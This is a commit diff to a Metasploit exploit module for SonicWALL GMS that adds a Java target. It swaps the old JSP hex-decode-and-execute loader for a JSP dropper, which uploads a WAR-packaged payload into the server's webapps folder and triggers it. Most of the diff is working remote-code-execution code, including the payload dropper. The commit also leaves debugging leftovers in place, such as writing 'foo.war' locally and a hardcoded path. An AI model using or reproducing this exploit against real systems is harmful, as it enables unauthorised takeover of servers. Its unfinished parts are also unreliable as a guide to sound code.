Initial support for Java target

Still some debugging junk, needs some more love.

modules/exploits/multi/http/sonicwall_gms_upload.rb

@@ -5,10 +5,13 @@
 #   http://metasploit.com/
 ##
 
+load 'lib/msf/core/payload/java.rb'
+load 'lib/msf/core/encoded_payload.rb'
+load 'lib/msf/util/exe.rb'
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = GoodRanking
+	Rank = ExcellentRanking
 
 	HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
 
@@ -46,6 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'    => [ 'win', 'linux' ],
 			'Targets'     =>
 				[
+					[ 'SonicWALL GMS 6.0 Viewpoint / Java Universal',
+						{
+							'Arch' => ARCH_JAVA,
+							'Platform' => 'java'
+						}
+					],
 					[ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
 						{
 							'Arch' => ARCH_X86,
@@ -70,82 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 
-	def on_new_session
-		# on_new_session will force stdapi to load (for Linux meterpreter)
-	end
-
-
-	def generate_jsp
-		var_hexpath       = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_exepath       = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_data          = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_inputstream   = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_outputstream  = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_numbytes      = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_bytearray     = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_bytes         = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_counter       = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_char1         = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_char2         = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_comb          = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_exe           = Rex::Text.rand_text_alpha(rand(8)+8)
-		@var_hexfile      = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_proc          = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_fperm         = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_fdel          = Rex::Text.rand_text_alpha(rand(8)+8)
-
-		jspraw =  "<%@ page import=\"java.io.*\" %>\n"
-		jspraw << "<%\n"
-		jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n"
-		jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n"
-		jspraw << "String #{var_data} = \"\";\n"
-
-		jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n"
-		jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n"
-		jspraw << "}\n"
-
-		jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n"
-		jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n"
-
-		jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n"
-		jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n"
-		jspraw << "#{var_inputstream}.read(#{var_bytearray});\n"
-		jspraw << "#{var_inputstream}.close();\n"
-
-		jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n"
-		jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n"
-		jspraw << "{\n"
-		jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n"
-		jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n"
-		jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n"
-		jspraw << "#{var_comb} <<= 4;\n"
-		jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n"
-		jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n"
-		jspraw << "}\n"
-
-		jspraw << "#{var_outputstream}.write(#{var_bytes});\n"
-		jspraw << "#{var_outputstream}.close();\n"
-
-		jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n"
-		jspraw << "String[] #{var_fperm} = new String[3];\n"
-		jspraw << "#{var_fperm}[0] = \"chmod\";\n"
-		jspraw << "#{var_fperm}[1] = \"+x\";\n"
-		jspraw << "#{var_fperm}[2] = #{var_exepath};\n"
-		jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n"
-		jspraw << "if (#{var_proc}.waitFor() == 0) {\n"
-		jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
-		jspraw << "}\n"
-		# Linux and other UNICES allow removing files while they are in use...
-		jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n"
-		jspraw << "} else {\n"
-		# Windows does not ..
-		jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n"
-		jspraw << "}\n"
-
-		jspraw << "%>\n"
-		return jspraw
-	end
-
 	def get_install_path
 		res = send_request_cgi(
 			{
@@ -195,6 +128,11 @@ class Metasploit3 < Msf::Exploit::Remote
 					},
 				'connection' => 'TE, close'
 			})
+		if target['Platform'] == "win"
+			register_files_for_cleanup("#{location}\\#{filename}")
+		else
+			register_files_for_cleanup("#{location}/#{filename}")
+		end
 
 		if res and res.code == 200 and res.body.empty?
 			return true
@@ -236,44 +174,58 @@ class Metasploit3 < Msf::Exploit::Remote
 			@location = "#{install_path}webapps\\appliance\\"
 		end
 
+		# Generate the WAR containing the EXE containing the payload
+		jsp_name = "index"
+		app_base = rand_text_alphanumeric(4+rand(32-4))
 
-		# Upload the JSP and the raw payload
-		@jsp_name = rand_text_alphanumeric(8+rand(8))
+		war = payload.encoded_war({
+				:app_name => app_base,
+				:jsp_name => jsp_name,
+				:arch => target.arch,
+				:platform => target.platform
+			}).to_s
+		File.open("foo.war", "wb") { |fd| fd.write(war) }
 
-		jspraw = generate_jsp
-
-		# Specify the payload in hex as an extra file..
-		payload_hex = payload.encoded_exe.unpack('H*')[0]
-
-		print_status("#{@peer} - Uploading the payload")
-
-		if upload_file(@location, "#{@var_hexfile}.txt", payload_hex)
-			print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt")
-		else
-			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload")
-		end
-
-		print_status("#{@peer} - Uploading the payload")
-
-		if upload_file(@location, "#{@jsp_name}.jsp", jspraw)
-			print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp")
-		else
-			fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp")
-		end
-
-		print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
-		res = send_request_cgi(
+		dropper = jsp_bin_dopper(war, "#{install_path}webapps/foo.war")
+		upload_file("#{install_path}webapps/appliance", "foo-dropper.jsp", dropper)
+		send_request_cgi(
 			{
-				'uri'    => "#{@uri}appliance/#{@jsp_name}.jsp",
+				'uri'    => normalize_uri("#{@uri}appliance/foo-dropper.jsp"),
 				'method' => 'GET'
 			})
 
-		if res and res.code != 200
-			print_warning("#{@peer} - Error triggering the payload")
-		end
+		send_request_cgi(
+			{
+				'uri'    => normalize_uri("#{target_uri.path}/foo/#{app_base}/#{jsp_name}.jsp"),
+				'method' => 'GET'
+			})
+	end
 
-		register_files_for_cleanup("#{@location}#{@var_hexfile}.txt")
-		register_files_for_cleanup("#{@location}#{@jsp_name}.jsp")
+	def jsp_bin_dopper(bin_data, output_file)
+		jspraw =  %Q|<%@ page import="java.io.*" %>\n|
+		jspraw << %Q|<%\n|
+		jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+		jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+		jspraw << %Q|int numbytes = data.length();\n|
+
+		jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+		jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+		jspraw << %Q|{\n|
+		jspraw << %Q|  char char1 = (char) data.charAt(counter);\n|
+		jspraw << %Q|  char char2 = (char) data.charAt(counter + 1);\n|
+		jspraw << %Q|  int comb = Character.digit(char1, 16) & 0xff;\n|
+		jspraw << %Q|  comb <<= 4;\n|
+		jspraw << %Q|  comb += Character.digit(char2, 16) & 0xff;\n|
+		jspraw << %Q|  bytes[counter/2] = (byte)comb;\n|
+		jspraw << %Q|}\n|
+
+		jspraw << %Q|outputstream.write(bytes);\n|
+		jspraw << %Q|outputstream.close();\n|
+
+		jspraw << %Q|%>\n|
+		return jspraw
 	end
 
 end